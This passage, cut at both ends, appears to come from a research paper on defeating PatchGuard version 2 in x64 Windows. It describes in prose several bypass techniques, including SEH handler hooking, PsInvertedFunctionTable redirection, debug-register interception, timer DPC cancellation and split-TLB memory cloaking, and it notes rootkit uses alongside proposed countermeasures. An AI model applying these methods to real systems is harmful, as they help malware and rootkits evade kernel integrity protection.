are expected to be viable in principle. + +4.1) Interception of _C_specific_handler + +The simplest course of action for disabling PatchGuard version 2 is, in the +author's opinion, to intercept execution at _C_specific_handler. The +_C_specific_handler routine is responsible for dispatching exceptions for +routines compiled with the Microsoft C/C++ compiler (and using try/except, +try/finally, or try/catch clauses). This set of functions includes all ten of +the PatchGuard DPC routines and most other C/C++ functions in the kernel. It +also includes many third party driver routines as well; _C_specific_handler is +exported, and the compiler references this function for all C/C++ images that +utilize SEH in some form (imported from ntoskrnl). Due to this, Microsoft is +forced to export _C_specific_handler from the kernel perpetually, making it +difficult for Microsoft to deny access to the routine's address from the +perspective of third party drivers. Furthermore, because _C_specific_handler +is exported from the kernel, it is trivial to retrieve its address across all +kernel versions from the context of a third party driver. This approach +capitalizes on the fact that PatchGuard utilizes SEH in order to obfuscate the +call to the system integrity checking routine, in effect turning this +obfuscation mechanism into a convenient way to hijack execution control before +the system integrity check is actually performed. + +This approach can be implemented in several different ways, but the basic idea +is to intercept execution somewhere between the faulting instruction in the +PatchGuard DPC (whichever is selected at boot time), and the exception +handlers associated with the DPC routine which invoke the PatchGuard system +integrity check routine. With this in mind, _C_specific_handler is exactly +what one could hope for; _C_specific_handler is invoked when the benign access +violation triggered by the bogus DeferredContext value to the PatchGuard DPC +routine is called. Furthermore, being exported, there are no concerns with +compatibility with future kernel versions, or different flavors of the kernel +(PAE vs non-PAE, MP vs UP, and soforth). + +Although hooking _C_specific_handler provides a convenient way to gain control +of execution in the execution path for the PatchGuard check routine, there +remains the problem of how to safely defuse the check routine and resume +execution at a safe point such that DPCs continue to be processed by the +system in a timely fashion. On x86, this would pose a serious problem, as in +this context, we (as an attacker attempting to bypass PatchGuard) would gain +control at an exception handler with a context record describing the context +at middle of the PatchGuard DPC routine, with no good way to unwind the +context back up to the DPC routine's caller (the kernel timer DPC dispatcher). + +Ironically, by virtue of being only on x64 and not x86, this problem is made +trivial where it might have been difficult to solve in a generalized fashion +on x86. Specifically, there is extensive unwind support baked into the core +of the x64 calling convention on Windows, such that there exists metadata +describing how to unwind any function that manipulates the stack at any point +in its execution lifetime. This metadata is used to implement unwind +semantics that allow functions to be cleanly unwound without having to call +exception/unwind handlers implemented in code that depend on the execution +context of the routine they are associated with. This extensive unwind +metadata can be used to our advantage here, as it provides a clean mechanism +to unwind past the DPC routine (to the DPC dispatcher) in a completely +compatible and kernel-version-independent manner. Furthermore, there is no +good way for Microsoft to disable this unwind metadata, given how deeply +involved it is with the x64 calling convention. + +The process of using the unwind metadata of a function to unwind an execution +context is known as a virtual unwind, and there is a documented, exported +routine [5] to implement this mechanism: RtlVirtualUnwind. Using +RtlVirtualUnwind, it is possible to alter the execution context that is +provided as an argument to _C_specific_handler (and thus the hook on +_C_specific_handler). This execution context describes the machine state at +the time of the access violation in the PatchGuard DPC routine. After +performing a virtual unwind on this execution context, all that remains is to +return the manifest ExceptionContinueExecution constant to the kernel mode +exception dispatcher in order to realize the altered context. This completely +bypasses the PatchGuard system integrity check. As an added bonus, the hook +on _C_specific_handler is only needed until the first time PatchGuard is +called. This is due to the fact that the PatchGuard timer is a one-shot +timer, and as the code to re-queue the timer is skipped by the virtual unwind, +PatchGuard is effectively permanently disabled for the remainder of the +Windows boot session. + +The last remaining obstacle with this bypass technique is filtering out the +specific PatchGuard access violation exceptions from legitimate access +violations that kernel mode code may produce. This is important, as access +violations in kernel mode are a normal part of parameter validation (the probe +and lock model used to validate user mode pointers) for drivers and system +services. Fortunately, it is easy to make this determination, as it is +generally only legal to use a try/except to catch an access violation relating +to a user mode address from kernel mode (as previously described). PatchGuard +is a rare exception to this rule, in that it has a well-defined no-mans-land +region where accesses can be attempted without fear of a bugcheck occurring. +As a result, it is a safe assumption that any access violation relating to a +kernel mode address is either PatchGuard trigger its own execution, or a very +badly behaved third party driver that is grossly breaking the rules relating +to Windows kernel mode drivers. It is the author's opinion that the latter +case is not worth considering as a blocker, especially since if such a +completely broken driver were to exist, it would already be randomly bringing +the system down with bugchecks. It is worth noting, as an addendum, that the +referenced address in the exception information block passed to the exception +handler will always be 0xFFFFFFFF`FFFFFFFF due to how violations on +non-canonical addresses are reported by the processor. This does not impact +the viability of this technique as a valid way to bypass PatchGuard in a +version-independant manner, however. + +It is worth noting that the fact that this technique involves modifying the +kernel is not a problem (aside from the inherent race conditions involved in +safely patching a running binary). The hook will disable PatchGuard before +PatchGuard has a chance to notice the hook from the context of the system +integrity check routine. + +This proposed approach has several advantages over the previously suggested +approach by Uninformed's original paper on PatchGuard[2]. Specifically, it does +not involve locating each individual DPC routine (and does not even rely on +any sort of code fingerprinting; only exported symbols are used). This +improves both the reliability of the proposed approach (as code fingerprinting +always introduces an additional margin of error as far as false positives go) +and its resiliency to attack by Microsoft. Because this technique relies +solely on exported functions, and does not carry any sort of dependency on how +many possible DPCs are available to PatchGuard for use (or any sort of +dependency on locating them at runtime), blocking this approach would be +significantly more involved than simply adding another possible DPC routine or +changing the attributes of an existing DPC routine in an effort to third-party +drivers that were taking a signature-based approach to locating DPC routines +for patching. + +Although this technique is quite resilient to kernel changes that do not +directly involve the underlying mechanisms by which PatchGuard itself +functions (the fact that it can operate unmodified on both Windows Server 2003 +x64 and Windows Vista x64 is testament to this fact), there are a number of +different ways by which Microsoft could block this attack in a future update +to PatchGuard. The most obvious solution is to entirely abandon SEH as a core +mechanism involved in arranging for the PatchGuard system integrity check. +Abandoning SEH removes the convenient mechanism (hooking _C_specific_handler) +that is presented here as a version-independent way to hook in to the +execution path involved in PatchGuard's system integrity check. If Microsoft +were to go this route, a would-be attacker would need to devise another +mechanism to achieve control of execution before the system integrity check +runs. Assuming that Microsoft played their hand correctly, a future +PatchGuard revision would not have such an easily-accessible mechanism to hook +into the execution process in a generic manner, largely counteracting this +proposed approach. Microsoft could also employ some sort of pre-validation of +the exception handler path before the DPC triggers an exception, although +given that this is not the easiest and most elegant way to counter such a +technique, the author feels that it is an unlikely solution. + +4.2) Interception of DPC Exception Registration + +Presently, all execution paths leading to the execution of PatchGuard DPC +routines involve an exception/unwind handler. This is another single point of +failure weakness that can be exploited by third parties attempting to disable +PatchGuard. An approach involving the detection of all of the PatchGuard DPC +routines, followed by interception of the exception handler registrations for +each DPC is proposed as another means of defeating PatchGuard. + +Though this technique is not as clean or clear-cut as the technique proposed +in 4.1, this approach is considered by the author as a viable bypass mechanism +for PatchGuard version 2. This technique essentially involves patching the +exception registrations for each possible DPC routine that could be used by +PatchGuard, such that each exception registration points to a routine that +employs a virtual unwind to safely exit out of the PatchGuard DPC without +invoking the system integrity check. Any such approach faces several +obstacles, however. + +The first major difficulty for this technique is locating each PatchGuard DPC. +Since none of the PatchGuard DPC routines are exported, a little bit more +creative thinking is involved in finding the locations to patch. The author +feels that a combination of pattern matching and code fingerprinting would +best serve this goal; there are a number of commonalities between the +different PatchGuard DPC routines that could be used to locate them with a +relatively high degree of confidence in PatchGuard version 2. Specifically, +the author feels that the following criteria are acceptable for use in +detecting the PatchGuard DPC routines: + + 1. Each DPC routine has one exception/unwind-marked registration with + _C_specific_handler. + 2. Each DPC routine has exactly four _C_specific_handler scopes. + 3. Each DPC routine is referenced in raw address form (64-bit pointer) in + the executable code sections comprising ntoskrnl at least twice. + 4. Each DPC routine has at least two _C_specific_handler scopes with an + associated unwind/exception handler. + 5. Each DPC routine has exactly one Cspecifichanlder scope with a call to a + common subfunction that references RtlUnwindEx (an exported routine). + 6. Each DPC routine has several sets of distinctive, normally rare + instructions (ror/rol instructions). + +Given several (or even all) of these criteria, it should be possible to +accurately locate all ten DPC routines via scanning non-pagable code in the +kernel. It is possible to locate the exception registration information for +the DPC routines through processing of the exception directory for the kernel +(and indeed, most of the criteria require doing this as a prerequisite). +Locating the kernel image base is fairly trivial as well; the address of an +exported routine can be taken, and truncated to a 64K region. From there, one +need only perform downward searches in 64K increments for the DOS header +signature (followed by a check for a PE32+ header). + +Another hurdle that must be solved for this approach is the placement of the +replacement exception handler routines. These routines are required to be +within 4GB of the kernel image base (there is only a 32-bit RVA in the unwind +metadata), meaning that in general, it is not practical to simply store them +in a driver binary or pool allocation (by default, these addresses are usually +far more than 4GB away from the kernel image base). There are no documented +and exported routines to allocate kernel mode virtual memory at a specific +virtual address to the author's knowledge. However, other, less savory +approaches could theoretically be taken (such as allocating physical memory +and altering paging structures directly to create a valid memory region within +4GB of the kernel image base). + +After one has solved these difficulties, the rest of this approach is fairly +trivial (and similar to portions of the technique described in 4.1). +Specifically, the replaced exception handlers need to invoke RtlVirtualUnwind +to unwind back to the kernel DPC dispatcher, and then request that execution +be resumed at the unwound context. + +This mechanism is not nearly as robust as the first in the author's point of +view, though both approaches could be disabled by abandoning SEH entirely as a +critical path in the execution of the PatchGuard system integrity check +routine. Specifically, Microsoft could change the characteristics of the DPC +routines in an attempt to frustrate fingerprinting and detection of them at +runtime. Pre-validation of unwind metadata (or additional checks in the +exception dispatcher itself to ensure that all SEH routines registered as part +of an image are within the confines of the image in-memory) could also be used +to defeat this technique. There are other security benefits to validating +that SEH routines on x64 that are registered as part of an image really exist +within an image, as will be discussed below. As such, the author would expect +this to appear in a future Windows version. + +4.3) Interception of PsInvertedFunctionTable + +Another variation on the theme of intercepting PatchGuard within the SEH code +path critical to the system integrity check routine involves taking advantage +of an optimization that exists in the x64 exception dispatcher. Specifically, +it is possible to utilize the fact that the exception dispatcher on x64 uses a +cache to improve the performance of exception handling. By taking advantage +of this cache, it may be possible to intercept control of execution when the +PatchGuard DPC routine deliberately creates an access violation exception in +order to trigger the system integrity check. This proposed technique uses the +nt!PsInvertedFunctionTable global variable in the kernel, which represents a +cache used to perform a fast translation of RIP values to an associated image +base and exception directory pointer, without having to do a (slow) search +through the linked list of loaded kernel modules. + +This technique is fairly similar to the one described in technique 4.2. Instead +of altering the actual exception directory entries corresponding to each +PatchGuard DPC routine in the kernel's image in-memory, this technique alters +the cached exception directory pointer stored within PsInvertedFunctionTable. +PsInvertedFunctionTable is consulted by RtlLookupFunctionTableEntry, in order +to translate a RIP value to an associated image (and unwind metadata block). +The logic within RtlLookupFunctionTable is essentially to search through the +cached entries resident in PsInvertedFunctionTable for an image that +corresponds to a given RIP value. If a hit is found, then the exception +directory pointer is loaded directly from the PsInvertedFunctionTable cache, +instead of through the (slower) process of parsing the PE header of the given +image. If no hit is found, then the loaded module linked list is searched. +Assuming a hit is made in the loaded module list, then the PE header for the +associated module is processed in order to locate the exception directory for +the module. From there, the exception directory is searched to locate the +unwind metadata block corresponding to the function containing the specified +RIP value. + +The structure backing PsInvertedFunctionTable (RTL_INVERTED_FUNCTION_TABLE) +can be described as so in C: + +typedef struct _RTL_INVERTED_FUNCTION_TABLE_ENTRY +{ + PIMAGE_RUNTIME_FUNCTION_ENTRY ExceptionDirectory; + PVOID ImageBase; + ULONG ImageSize; + ULONG ExceptionDirectorySize; +} RTL_INVERTED_FUNCTION_TABLE_ENTRY, * PRTL_INVERTED_FUNCTION_TABLE_ENTRY; + +typedef struct _RTL_INVERTED_FUNCTION_TABLE +{ + ULONG Count; + ULONG MaxCount; // always 160 in Windows Server 2003 + ULONG Pad[ 0x2 ]; + RTL_INVERTED_FUNCTION_TABLE_ENTRY Entries[ ANYSIZE_ARRAY ]; +} RTL_INVERTED_FUNCTION_TABLE, * PRTL_INVERTED_FUNCTION_TABLE; + +In Windows Server 2003, there is space reserved for up to 160 loaded modules +in the array contained within PsInvertedFunctionTable. In Windows Vista, this +number has been expanded to 512 module entries. The array of loaded modules +is maintained by the system module loader such that when a module is loaded or +unloaded, a corresponding entry within PsInvertedFunctionTable is created or +deleted, respectively. It is not a fatal error for the module array within +PsInvertedFunctionTable to be exhausted; in this case, performance for +exception dispatching relating to additional modules will be slower, but the +system will still function. + +Because the RIP-to-exception-directory cache described by +PsInvertedFunctionTable maintains a full 64-bit pointer to the exception +directory of the associated module, it is possible to disassociate the cached +exception directory pointer from its corresponding image. In other words, it +is possible to modify the ExceptionDirectory member of a particular cached +RTL_INVERTED_FUNCTION_TABLE_ENTRY to point to an arbitrary location instead of +the exception directory of that module. There are no security or integrity +checks that validate that the ExceptionDirectory member points to within the +given image. This could be exploited by a third-party driver in order to take +control of exception dispatching for any of the first 160 (or 512, in the case +of Windows Vista) kernel modules. This loaded module list includes critical +images such as the HAL (typically the first entry in the cache) and the kernel +itself (typically the second entry in the cache). With respect to bypassing +PatchGuard, this makes it possible for a third party driver to copy the +exception directory data of the kernel to dynamically allocated memory and +adjust it such that exception handlers for the PatchGuard DPC routines point +to a stub function that invokes a virtual unwind as described in technique 4.2. +After setting up its altered shadow copy of the exception directory for the +kernel, all that a third party driver would need to do is swap the +ExceptionDirectory pointer within the PsInvertedFunctionTable cache entry for +the kernel with the pointer to the shadow copy. Following that, this approach +is essentially the same as the proposed approach described in 4.2. It has the +added advantage of being more difficult to detect from the perspective of +validating the integrity of the exception dispatching path, as the exception +directory associated with the kernel image in-memory is not actually altered; +only a pointer to the exception directory in a cache is changed. + +This approach does require a reliable mechanism to detect +PsInvertedFunctionTable (which is not exported) at run-time, however. The +author feels that this is not a particularly difficult task, as the first few +members of PsInvertedFunctionTable (specifically, the maximum entry count and +the entries for the HAL and kernel) will have predictable values that can be +used in a classic egghunt style search of kernel global variable space. +Additional heuristics, such as requiring several data references to the +suspected PsInvertedFunctionTable location within kernel code could be applied +as well, in the interest of improving accuracy. + +This proposed approach may be countered by many of the proposed counters to +techniques 4.1 and 4.2. Additionally, this technique could also be countered by +validating exception directory pointers within PsInvertedFunctionTable, such +as by ensuring that such exception directory pointers are within the confines +of the purported associated image. Although this validation is not perfect +since it might still be possible for one to reposition the exception directory +pointer to a different location within the image that could be safely modified +at runtime, such as overlapping a large global variable array or the like, it +would certainly increase the difficulty of subverting the exception +dispatcher's RIP translation cache. Additional validation techniques, such as +requiring that the exception directory point to read-only memory, could be +similarly adopted to reduce the chance that a third party driver could +meaningfully subvert the cache (with results leading to something other than a +system crash). + +It should be noted that in the current implementation, PsInvertedFunctionTable +presents a relatively inviting target for potentially malicious software to +hijack parts of the kernel without being detected. Indeed, through careful +planned subversion of PsInvertedFunctionTable, third party software could take +control of exception dispatchers throughout the kernel in order to gain +control of execution. Though this technique would be much more limited than +outright kernel patching, it has the advantage of being completely undetected +by current PatchGuard versions (which cannot validate global variables that +may change without notice at runtime, for obvious reasons). It also has the +advantage of being undetected by current rootkit detection systems, which are +presently (to the author's knowledge) blissfully unaware of +PsInvertedFunctionTable. Although it would require administrative permissions +(or an exploit granting such permissions) for an attacker to modify +PsInvertedFunctionTable in the first place, Microsoft has at late focused a +great deal of effort on protecting the kernel even from users with +administrator permissions. For example, one could conceive of a rootkit-style +program that intercepts exception dispatchers for system services, and passes +invalid user mode pointers to system services in order to surreptitiously +execute kernel mode code without detection when the standard pointer probe +throws an exception indicating that the given usermode pointer parameter is +invalid. Given this sort of threat (from the rootkit perspective), the author +feels that it would be in Microsoft's best interests to put into place +additional validation of PsInvertedFunctionTable's cached exception directory +pointers (assuming that Microsoft wishes to continue down the path of +strengthening the kernel against malicious administratively-privileged code). + +4.4) Interception of KiDebugTrapOrFault + +Although many of the proposed techniques for blocking PatchGuard have so far +relied on the fact that PatchGuard utilizes SEH to kick off execution of the +system integrity check, there are different approaches that can be taken which +do not rely on this specific PatchGuard implementation detail. One such +alternative technique for bypassing PatchGuard involves subverting the kernel +debug fault handler: KiDebugTrapOrFault. This handler represents the entry +point for all debug exceptions (such as so-called hardware breakpoints), and +as such presents an attractive target for bypassing PatchGuard. + +The basis of this proposed technique is to utilize a set of hardware +breakpoints to intercept execution at a convenient critical location within +PatchGuard's execution path leading up to the system integrity check. This +technique has a greater degree of flexibility than many of the previously +described techniques, though this flexibility comes at cost of a significantly +more involved (and difficult) implementation. Specifically, one could use +this proposed technique to intercept control at any point critical to the +execution of PatchGuard's system integrity check (for example, the kernel DPC +dispatcher, one of the PatchGuard DPC routines, or a convenient location in +the exception dispatching code path, such as _C_specific_handler. + +The means by which this interception of execution could be accomplished is by +assuming control of debug exception handling. This could be done in several +different ways; for example, one could hook KiDebugTrapOrFault or alter the +IDT directory to simply repoint the debug exception to driver-supplied code, +bypassing KiDebugTrapOrFault entirely. There are even ways that this +interception could be done in a way that is transparent to the current +PatchGuard implementation, such as by intercepting PsInvertedFunctionTable as +described in technique 4.3. A driver could then alter the unwind metadata for +KiDebugTrapOrFault and create an exception handler for this routine. This +step would allow transparent, first-chance access to all debug faults (because +KiDebugTrapOrFault internally constructs and dispatches a STATUS_SINGLE_STEP +exception describing the debug fault; normally, this would present the +STATUS_SINGLE_STEP exception to a debugger, but there is no technical reason why +a standard SEH-style exception handler could not catch the exception). +Regardless of how control of execution at the debug trap handler is gained, +the next step in this proposed approach is to alter execution at the requested +point of interest (whether it be the kernel timer DPC dispatcher, which could +be easily found by queuing a DPC and executing a virtual unwind, or a +PatchGuard DPC routine, or _C_specific_handler or any other place of interest +in the critical PatchGuard execution path) to prevent PatchGuard's system +integrity check from executing. + +After the implementor has established control over the debug trap handler +(through whichever means desired), all that remains is to set +debug-register-based breakpoints on target locations. When these breakpoints +are hit, control is transferred to the debug trap handler, and from there to +the implementor's driver code which can act as necessary, such as by altering +the execution context of the processor at the time of the exception before +resuming execution. + +The advantages of this approach over directly patching into kernel code (i.e. +opcode replacement) are threefold. First, it is more flexible in that there +are no difficulties with placing an absolute 64-bit jump in an arbitrary +location (in x64, this typically takes around 12 opcode bytes to do from any +arbitrary location in memory). For example, one does not have to worry about +whether a the opcode space overwritten by the jump might overlap a whole +instruction boundary that is a jump target, which might lead to invalid code +being executed. Secondly, this approach can be used to get out of having to +implement a disassembler (or other similar forms of code analysis) in kernel +mode, as hardware breakpoints allow one to gain control of execution at a +precise location without having to worry about creating enough space for a +jump patch, and then placing the original instructions back into a jump stub +to allow execution to resume at the original effective instruction stream (if +desired). Finally, if done correctly, this technique could be implemented in +a truly race-condition free manner (as the only patching that would need to be +done is an interlocked 8-byte swap of a pointer-aligned value in +PsInvertedFunctionTable, if one took that approach). + +This approach does require that the implementor pick a location (or multiple +locations) in the kernel that are to have breakpoints set over in order to +gain execution control. There are many possibilities, such as the DPC +dispatcher (where one could filter out the PatchGuard DPC by detecting, say, +invalid kernel pointers in DeferredContext), the execution dispatcher path +(where one could unwind past a PatchGuard DPC's access violation exception), a +PatchGuard DPC itself (where one could again unwind past with +RtlVirtualUnwind, bypassing PatchGuard if the DPC is being invoked by +PatchGuard), or any other choice area. One of the advantages of this approach +is that it is comparatively easy to intercept execution anywhere in the kernel +that can be reliably located across kernel versions, making it potentially a +great deal more flexible to being easily adapted to defeat future PatchGuard +implementations than some of the previously discussed bypass techniques. + +Normally, the kernel has logic in place that prevents stray kernel addresses +from being placed in debug registers by user mode code via NtSetContextThread. +It may be necessary to make additional alterations to ensure that the custom +values in the debug registers are persisted across context switches, via the +same mechanisms used by the kernel debugger to persist debug registers. + +In the author's opinion, this technique would be difficult for Microsoft to +defeat in principle, barring hardware support (like virtualization). Although +Microsoft could move around critical code paths for PatchGuard, this technique +presents a general mechanism by which any location in the kernel could be +surreptitiously intercepted, thus lending itself to relatively easy adaptation +to future PatchGuard revisions. One approach that could be taken is to +perform increased validation of the debug trap handler in an attempt to make +it more difficult to intercept without being detected by PatchGuard or some +other validation mechanism. Other counters to this sort of tactic (in +general) would be to make it difficult to reliably locate all of the critical +code paths in a consistent and reliable manner across all kernel versions, +from the perspective of a third party driver. This is likely to prove +difficult, as a great deal of the internal workings of the kernel are exposed +in some way to drivers (i.e. exported functions), or are otherwise indirectly +exposed to drivers (i.e. trap labels via the IDT, exception handlers via +unwind metadata and exports used in the process of dispatching exceptions to +SEH registrations). Completely insulating PatchGuard from all such externally +visible locations (that could be comparatively easily compromised by a third +party driver) would, as a result, likely be an arduous task. + +The debug trap handler can be used to do more than simply evade PatchGuard for +purposes of allowing conventional kernel code patches via opcode replacement. +It can also be utilized in order to completely eliminate the need to perform +opcode-replacement-based kernel patches in order to gain execution control. +In this vein, via assuming control of the debug trap handler in a way that is +transparent to PatchGuard (such as via the proposed +PsInvertedFunctionTable-based approach), it would then be possible to set +debug-register-based breakpoints at every address of interest (assuming that +there enough debug registers to patch all of the locations of interest). From +the debug trap handler, it is possible to completely alter the execution +context at the point of the debug exception, which is exactly the same as what +one could do via traditional opcode-replacement-based patching for a given +location. This sort of transparent patching would be extremely difficult for +Microsoft to detect, because the debug registers must remain available for use +by the kernel debugger. Without completely crippling the ability of the +kernel debugger to set breakpoints without being attached before PatchGuard is +initialized, the author does not see a particularly viable (i.e. without a +trivial workaround) way for Microsoft to prevent the use of debug registers to +alter execution context at select points in the kernel (from a third party +driver). Because such an approach would capitalize on the fact that Microsoft +must, from a business case perspective, make it possible for IHVs and ISVs to +debug their code on Windows, the author believes that it would be unlikely to +be successfully disabled by Microsoft. Furthermore, because such techniques +can be implemented without even having the basic requirement of disabling +PatchGuard, they would be inherently much more likely to work with future +PatchGuard revisions. After all, if PatchGuard can't even detect changes to +the kernel (because kernel code isn't being patched), then there is no reason +to even bother with trying to disable it, which gets one out of the +comparatively messy business of playing catch-up with Microsoft with each new +PatchGuard revision. + +4.5) General Detect Bit Interception + +One of PatchGuard's anti-debug mechanisms relates to debug registers. +Specifically, PatchGuard attempts to clear Dr7 (the debug control register) in +an attempt to disable all debug-register-based breakpoints, as one of the +first tasks upon entering the system integrity check routine. This presents +an inherent weakness within PatchGuard, as there is support built-in to the +processor that allows one to detect (and intercept) direct accesses to any of +the debug registers. This support is primarily legacy, intended for so-called +in-circuit emulators (ICEs), which were special hardware components that acted +as a true hardware-based debugger by allowing one to control a processor from +outside the context of the system entirely, in essence truly isolating the +debugger from the operating system and any programs running under it. This +support is embodied in the General Detect bit in Dr7, which when set, causes a +debug trap to be generated on any successful access to a debug register. This +is significant in that it provides a way for an attacker to trap PatchGuard's +access to Dr7 (zeroing it), which in effect provides a means to pinpoint the +exact location of PatchGuard's system integrity routine in-memory, +in-plaintext. Furthermore, it gives an attacker the possibility of making any +alterations desired to the execution context at the very start of the system +integrity check, which could be trivially used in order to simply implement an +immediate return out of the system integrity check logic without actually +verifying the system's integrity (as dr7 is zeroed before any integrity checks +are performed). This approach effectively turns another one of PatchGuard's +protection mechanisms against it, utilizing the anti-debug-register behavior +to detect (and block) PatchGuard. + +The general idea behind this approach is similar to that described in +technique 4.4. In the same fashion as in technique 4.4, an implementor of this +approach is required to gain control of the debug trap handler. For this +task, any of the proposed approaches in technique 4.4 may be used. After control +of the debug trap handler is established, an attacker must then set the +general detect bit in Dr7 and wait for PatchGuard to access the debug +registers. It should be noted that during the legitimate course of execution, +the kernel itself will often directly access debug registers, such as during +context switches or if NtSetContextThread/NtGetContextThread are invoked. Any +such implementation of this technique must be able to differentiate between +PatchGuard's accesses of the debug registers and legitimate accesses. This +could be trivially implemented by checking if the RIP value at the time of the +trap was within a valid kernel image or not, as the PatchGuard system +integrity check routine resides in dynamically allocated non-paged pool and +not within the confines of the kernel images in-memory. + +When the debug trap handler is invoked as a result of PatchGuard zeroing Dr7, +then the appropriate action (which could be as trivial as simply executing a +hard return out of the system integrity check routine) can be taken by the +third-party driver wishing to disable PatchGuard. + +Like the techniques that capitalize on PatchGuard's use of SEH to obfuscate +the call to the system integrity check routine, this approach relies on using +one of PatchGuard's defensive mechanisms against it. The most obvious counter +would be to thus remove the behavior of zeroing debug registers. However, +disabling this behavior may not be very desirable, as it would then be very +easy to detect PatchGuard by, say, setting a read breakpoint on kernel code +and waiting for PatchGuard to perform a read. Since reads of kernel code (as +opposed to execute fetches) are fairly atypical, this would open up another +easy mechanism by which PatchGuard could be bypassed. + +The best course of action by Microsoft here would be to make it as difficult +as possible to differentiate between legitimate accesses to debug registers +and PatchGuard's own accesses, although this is likely to not be very doable. +Strengthening the debug trap path against interception by placing additional +validation checks over that code path might also be useful in countering this +technique, although likely to only a limited, easily-bypassable extent. + +4.6) Patching the Kernel Timer DPC Dispatcher + +Currently, PatchGuard utilizes a timer with an associated DPC to transfer +control to a preselected one of ten possible legitimate DPC routines that have +been slightly modified for use with PatchGuard. Because third party kernel +drivers are given a documented and exported interface to create timers with +associated DPC routines, this represents a weakness in PatchGuard, in that it +presents an easily-detectable location in the critical execution path for +PatchGuard's system integrity check routine that could be relatively easily +compromised by a third-party driver. This technique focuses on gaining +control of the timer DPC dispatcher, with the goal of detecting when the +PatchGuard DPC is about to be dispatched. When the PatchGuard DPC is +detected, then the third-party driver could skip over the PatchGuard DPC +routine entirely, thus disabling PatchGuard. + +In order to accomplish this, a third party driver would need to locate the +exact instruction within the kernel timer DPC dispatcher that is responsible +for making calls to timer DPC routines. Fortunately, this is a fairly easy +task for a driver, as the interfaces for creating timers with associated DPCs +and DPC routines are documented and exported. Specifically, a third party +driver could queue a timer DPC, and then record address of the DPC dispatcher +routine via inspection of the return address of the timer DPC routine when it +is called. From there, the driver can derive the address of the call +instruction responsible for making the call to the DPC routine associated with +a DPC object that is associated with a timer. + +At this point, all a third party driver needs to do is patch the call +instruction in the DPC dispatcher to transfer execution control to the +driver's code. From there, the driver can filter all timer DPCs for the +PatchGuard DPC routine (perhaps by looking for a bogus kernel address in +DeferredContext, paired with a DPC routine that is within the confines of the +kernel image in-memory). When the PatchGuard DPC is detected, then the driver +can decline to call the DPC routine and instead simply return control to the +kernel DPC dispatcher after the call instruction in the logical original +instruction stream. This effectively prevents PatchGuard from ever running +the system integrity check, which again gives the driver free reign to patch +the kernel without fear of intervention by PatchGuard. + +In the author's opinion, the best way to prevent this approach is to use a +multitude of different mechanisms to kick off execution of the PatchGuard +check routine. For example, a dedicated thread waiting on a timer could also +be used, or a frequently-called system routine could be modified to +periodically make calls to PatchGuard. As long as calls to PatchGuard are +funneled through one location, such as the timer DPC dispatcher, the entire +PatchGuard integrity check system is at risk of being trivially bypassed in +one fell swoop by third party drivers. + +4.7) Searching for the PatchGuard DPC + +PatchGuard currently uses a KTIMER object with an associated KDPC object, both +allocated within non-paged pool memory, as a periodic trigger used to start +PatchGuard's system integrity check routine. It should be possible to locate +this timer object in memory and cancel it, preventing PatchGuard from +executing. + +The implementation of this technique is essentially a classical egghunt style +search through non-paged pool, with some specially defined restrictions as to +how to find the target. Specifically, one is looking for a region of memory +matching the following criteria: + + 1. The memory is a valid KTIMER object. This means that the linked list + entries should be valid, and point to other seemingly valid KTIMER objects (or + the list head), and that the type field of the KTIMER is consistent with a + timer object. + 2. The timer should have a timer interval in the range of several minutes. + PatchGuard applies a randomized fuzz factor to the timer interval (within a + small range), but verifying that the range of the timer is no more than + several minutes (say 7 or 8) should be an ample sanity check. + 3. The timer should have a KDPC associated with it (and the pointer should + be valid non-paged pool). + 4. The associated KDPC should have the appropriate type field. + 5. The associated KDPC should have a DPC routine that is within the confines + of the kernel image in-memory. + 6. The associated KDPC should have a DeferredContext value that is a + non-canonical kernel address. + +After the DPC is found, it can simply be canceled in order to disable +PatchGuard. Similar approaches as could be used to prevent technique 4.6 would +be applicable here. Specifically, a diversity in the set of paths leading up +to PatchGuard's execution would make a technique like this, which is targetted +at one path (such as the timer DPC dispatcher) less effective at blocking +PatchGuard. + +4.8) TLB Desynchronization (Split TLB) + +All x86 processors supporting protected mode and paging employ a caching +scheme to speed up the translation of virtual addresses to physical addresses. +This scheme is implemented via a set of Translation Lookaside Buffers, or +TLBs, which cache the contents of the page attributes (and associated physical +address) for a given virtual address. Recent x86 processors (Pentium II-class +or later) utilize several sets of TLBs, such as one set of TLBs for data +accesses and one set of TLBs for instruction accesses. In normal system +operation, both TLBs (if a processor supports multiple TLBs) maintain +consistent views for the attributes of a particular page; however, it is +possible to deliberately desynchronize the contents of these TLBs, thereby +maintaining the illusion that a single page has different attributes depending +on whether it is referenced as data or as executable code. This deliberate +desynchronization of TLBs has many uses, from the implementation of no-execute +support (utilized by PaX/GRsec on GNU/Linux [6]) to ``memory cloaking'', a +technique often used by rootkits to provide one view of memory when memory is +referenced as data by a read operation, and a different view of memory if +memory is referenced by an instruction fetch. This same memory cloaking +technique that has appealed to rootkit developers for the purpose of hiding +rootkits from detection can also be used to hide kernel patching from +PatchGuard's integrity check. Strictly speaking, this proposed technique is +not a bypass mechanism for PatchGuard; rather, it is a mechanism to hide +kernel patching from PatchGuard, thus making PatchGuard harmless to third +parties that are patching the kernel. + +The details of this approach are essentially similar in many respects to that +of any program implementing a split-TLB approach to altering page attributes +or contents based on execute or read fetches. The exact details behind how +this can be accomplished are beyond the scope of this paper, and are discussed +elsewhere, by the PaX team (in the context of implementing no-execute on +legacy platforms) [6], and by Sherri Sparks and Jamie Butler (in the context of +implementing a Windows rootkit that utilizes split-TLBs to implement so-called +``memory cloaking'') [7]. Interested readers are encouraged to review these +references for the raw details on how the general split-TLB concept is +implemented. Although the referenced articles directly apply to x86, the +concepts apply in principle to x64 as well, and can likely be made to work on +x64 with minimal modification. + +After one has established a mechanism for desynchronizing TLBs (such as by +hooking the page fault handler), the recommended approach for this technique +is to desynchronize the TLBs for any regions in the kernel where one is +performing traditional opcode-replacement-based patching or hooking. +Specifically, when kernel code is read for execute on a page where an +opcode-replacement-based patch is in place, then the patched page should be +returned. If kernel code is read for a data reference (such as PatchGuard +making a read of kernel code to validate its integrity), then the original +data should be returned. This technique effectively hides all modifications +to kernel code to any access other than direct execution, which prevents +PatchGuard from detecting that kernel code has been altered by a third party. + +Note that in order for this approach to succeed, the hook on the page fault +handler itself must be hidden from PatchGuard. This cannot be directly +accomplished by the same TLB desynchronization tactic, as the page fault +handler must remain resident. A combined approach, such as utilizing a debug +breakpoint on the page fault handler (when coupled with a subverted debug trap +handler, perhaps via PsInvertedFunctionTable as described previously in +technique 3) along with a scheme to prevent PatchGuard from disabling +debug-register-based breakpoints (such as described in technique 5) might be +needed in order to hook the page fault handler in a manner truly 